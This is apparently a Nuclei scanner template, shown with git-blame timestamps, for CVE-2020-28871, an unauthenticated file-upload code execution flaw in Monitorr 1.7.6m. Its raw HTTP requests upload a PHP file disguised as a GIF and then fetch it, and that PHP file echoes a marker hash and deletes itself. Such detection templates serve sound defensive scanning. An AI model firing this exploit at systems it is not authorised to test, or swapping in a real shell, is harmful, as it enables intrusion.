2021-07-20 06:03:16 +00:00
id : CVE-2020-28871
2021-07-19 23:20:18 +00:00
info :
name : Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author : gy741
severity : critical
2022-05-17 09:18:12 +00:00
description : Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to a patched version of Monitorr or apply the necessary security patches.
2021-08-18 11:37:49 +00:00
reference :
2021-07-19 23:20:18 +00:00
- https://www.exploit-db.com/exploits/48980
2022-03-29 10:33:49 +00:00
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-28871
cwe-id : CWE-434
2024-03-23 09:28:19 +00:00
epss-score : 0.96907
epss-percentile : 0.99693
2024-01-29 17:11:14 +00:00
cpe : cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2024-01-29 17:11:14 +00:00
vendor : monitorr
2023-07-11 19:49:27 +00:00
product : monitorr
2024-04-08 11:34:33 +00:00
tags : cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project
2023-03-29 11:07:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-19 23:20:18 +00:00
- raw :
- |
POST /assets/php/upload.php HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept : text/plain, */*; q=0.01
Connection : close
Accept-Language : en-US,en;q=0.5
X-Requested-With : XMLHttpRequest
Content-Type : multipart/form-data; boundary=---------------------------31046105003900160576454225745
Origin : http://{{Hostname}}
Referer : http://{{Hostname}}
-----------------------------31046105003900160576454225745
2021-07-20 06:03:16 +00:00
Content-Disposition : form-data; name="fileToUpload"; filename="{{randstr}}.php"
2021-07-19 23:20:18 +00:00
Content-Type : image/gif
2023-06-15 11:44:34 +00:00
GIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>
2021-07-19 23:20:18 +00:00
-----------------------------31046105003900160576454225745 --
- |
2021-07-20 06:03:16 +00:00
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
2021-07-19 23:20:18 +00:00
Host : {{Hostname}}
2023-03-29 10:18:20 +00:00
matchers-condition : and
2021-07-19 23:20:18 +00:00
matchers :
- type : word
2023-06-16 04:47:21 +00:00
part : body_2
2023-03-29 10:18:20 +00:00
words :
2023-06-15 11:44:34 +00:00
- "d03c180355b797069cc047ff5606d689"
2023-03-29 10:18:20 +00:00
2023-06-15 11:44:34 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a0047304502206d7e875ef689448d4fe81a02c406847d917a099c25b098a99ef1316ace5e8c08022100d60b0fa98c183d7f252ecb56b52dc4c78730673b6ed6cffa0013a8e863987a28:922c64590222798bb761d5b6d8e72950